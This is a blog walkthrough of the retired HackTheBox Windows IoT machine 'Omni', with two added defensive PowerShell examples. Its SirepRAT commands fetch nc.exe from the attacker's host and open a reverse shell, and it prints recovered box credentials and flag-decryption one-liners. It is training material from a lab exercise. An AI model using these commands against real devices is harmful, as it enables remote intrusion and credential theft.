Hackthebox - Omni

Summary

Omni, a Windows IoT box created by HackTheBox user egre55, was an overall easy-difficulty box. The initial foothold was finding the SirepRAT issue on Windows IoT machines and using it to get a shell on the box. Enumerating the box, we find a bat file in C:\Program Files\WindowsPowerShell\Modules\PackageManagement containing credentials; using them on the web application on port 8080 we can get a reverse shell as the app user and then as Administrator.

Initial Enumeration

nmap

# Nmap 7.80 scan initiated Sun Aug 23 09:36:01 2020 as: nmap -Pn -sC -sV -oN nmap/omni 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up (0.081s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8080/tcp open upnp Microsoft IIS httpd
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 09:36:21 2020 -- 1 IP address (1 host up) scanned in 20.10 seconds

This reveals it is some kind of Windows server with two open ports, 135 and 8080.

So let's start with 8080.

Web (PORT:8080)

Checking the page doesn't reveal anything; it just asks for credentials.

Let's run gobuster and move on to 135.

MSRPC (Port:135)

Enumerating this, we don't find anything.

My current goal was to find any credentials I could use on port 8080.

Let's get back to the whiteboard and look at it from another angle. We know this is a Windows IoT box, based on the Windows Device Portal.

Let's look for an exploit for that.

I cloned SirepRAT; let's try that.

Running

python SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
<SystemInformationResult | type: 51, payload length: 32, kv: {'wProductType': 0, 'wServicePackMinor': 2, 'dwBuildNumber': 17763, 'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'wSuiteMask': 0, 'dwPlatformId': 2, 'wReserved': 0, 'wServicePackMajor': 1, 'dwMinorVersion': 0, 'szCSDVersion': 0}>

gets us output. Okay, now we can get a reverse shell by uploading nc and executing it.

Uploading ncat

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell iwr -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe -Uri http://10.10.14.21/nc.exe"

Executing ncat

python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\nc.exe 10.10.14.21 1234 -e powershell"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>

which gives us a reverse shell.

Trying whoami didn't work for us, but we can get the user with $env:UserName.

Enumerating, we find an interesting file, r.bat, in C:\Program Files\WindowsPowerShell\Modules\PackageManagement, which creates users:

net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz

As you can see, there are two credentials in the r.bat file, so using these credentials we can log in to the web application of the machine (remember the web server running on port 8080).
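A defender's counterpart to this finding, added here as an example and not part of the original writeup: a small PowerShell scanner that hunts provisioning scripts for `net user <account> <password>` lines, the pattern that leaked both passwords in r.bat. The directory, file names, account names and passwords it creates under $env:TEMP are constructed for the demonstration.

```powershell
# Added example (not from the writeup): find plaintext "net user <account> <password>"
# lines in scripts, the way r.bat leaked credentials on Omni.
# The scan directory, sample scripts, account names and passwords are constructed.

$scanRoot = Join-Path $env:TEMP 'cred-hunt-demo'
New-Item -ItemType Directory -Path $scanRoot -Force | Out-Null

# One script that hardcodes passwords (constructed values) ...
@'
@echo off
net user app P@ssw0rd-demo
net user administrator An0ther-demo-secret
net user /domain
'@ | Set-Content -Path (Join-Path $scanRoot 'provision.bat')

# ... and one that only prompts for a password ("*") and must not be flagged.
@'
Write-Host "nothing to see here"
net user app *
'@ | Set-Content -Path (Join-Path $scanRoot 'harmless.ps1')

function Find-HardcodedNetUser {
    param(
        [Parameter(Mandatory)] [string] $Path
    )
    # Second token after "net user" is the account; a third token that is not a
    # switch ("/add", "/domain") and not the prompt marker ("*") is a literal password.
    $pattern = '\bnet\s+user\s+(?<account>[^\s/*]+)\s+(?<password>[^\s/*]\S*)'

    Get-ChildItem -Path $Path -Recurse -File -Include *.bat,*.cmd,*.ps1,*.vbs |
        Select-String -Pattern $pattern -AllMatches |
        ForEach-Object {
            foreach ($m in $_.Matches) {
                [pscustomobject]@{
                    File           = $_.Path
                    Line           = $_.LineNumber
                    Account        = $m.Groups['account'].Value
                    # Report that a secret is present without echoing it into the log.
                    PasswordLength = $m.Groups['password'].Value.Length
                }
            }
        }
}

Find-HardcodedNetUser -Path $scanRoot | Format-Table -AutoSize

Remove-Item -Path $scanRoot -Recurse -Force
```

Run against the demo directory it reports the two lines in provision.bat (accounts app and administrator) and nothing for harmless.ps1; point `-Path` at directories such as the PowerShell Modules folder or a build's provisioning scripts to catch this class of leak before an image ships.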

Log in via app:mesh5143.

Enumerating more, we check another drive.

We are app now, so we can read the user.txt file, but the content looks encrypted and we need to decrypt it.

For that we need to execute the following commands:

$c = Import-CliXml -Path U:\Users\app\user.txt
$c.GetNetworkCredential().Password

We got the user flag; now let's capture the root flag.

Privilege Escalation

Remember we found two usernames in the r.bat file? Let's use the second one, the Administrator.

Close Firefox and start it again.

Login via: administrator:_1nt3rn37ofTh1nGz

Start another Netcat listener.

We get a reverse shell.

Now let's decrypt the root.txt file:

$c = Import-CliXml -Path U:\Users\administrator\root.txt
$c.GetNetworkCredential().Password

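Both flag files on this box were PSCredential objects saved with Export-Clixml, which is why the Import-CliXml one-liners above (for user.txt and for root.txt) only work from a shell running as the owning account. The following PowerShell round-trip, added here as an example rather than taken from the writeup, builds such a file and reads it back; the file path, account name and secret are constructed. On Windows, Export-Clixml protects the SecureString with DPAPI keyed to the current user, so the XML holds a ciphertext blob and a different account gets a decryption error instead of the password.

```powershell
# Added example (not from the writeup). Windows-only: when Export-Clixml writes a
# PSCredential, the SecureString is protected with DPAPI in current-user scope.
# Path, account name and secret below are constructed for the demo.

$storePath = Join-Path $env:TEMP 'demo-cred.xml'

# 1. Store a credential the same way the flag files on Omni were produced.
$secret = ConvertTo-SecureString 'demo-flag-value' -AsPlainText -Force
$cred   = New-Object System.Management.Automation.PSCredential ('app', $secret)
$cred | Export-Clixml -Path $storePath

# 2. Inspect what landed on disk: the user name is in clear text, the password is a
#    long hex DPAPI blob, so opening the file does not reveal the secret.
Select-String -Path $storePath -Pattern 'UserName|Password' | ForEach-Object { $_.Line.Trim() }

# 3. Read it back. Only the Windows account that wrote the file, on this machine,
#    can unprotect it; another account, or a copy taken elsewhere, fails at the DPAPI step.
function Read-StoredCredential {
    param([Parameter(Mandatory)][string] $Path)
    try {
        $c = Import-Clixml -Path $Path
        [pscustomobject]@{
            UserName = $c.UserName
            Password = $c.GetNetworkCredential().Password
        }
    }
    catch {
        Write-Warning "Could not unprotect $Path as $($env:USERNAME): $($_.Exception.Message)"
    }
}

Read-StoredCredential -Path $storePath

Remove-Item -Path $storePath -Force
```

The takeaway for the flag files is the same as for any credential stored this way: the protection is a per-user boundary, not a per-file password, so the file is only as safe as the account that owns it, and that is exactly the boundary the shell as app and then as administrator crossed here.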
Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/omni/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.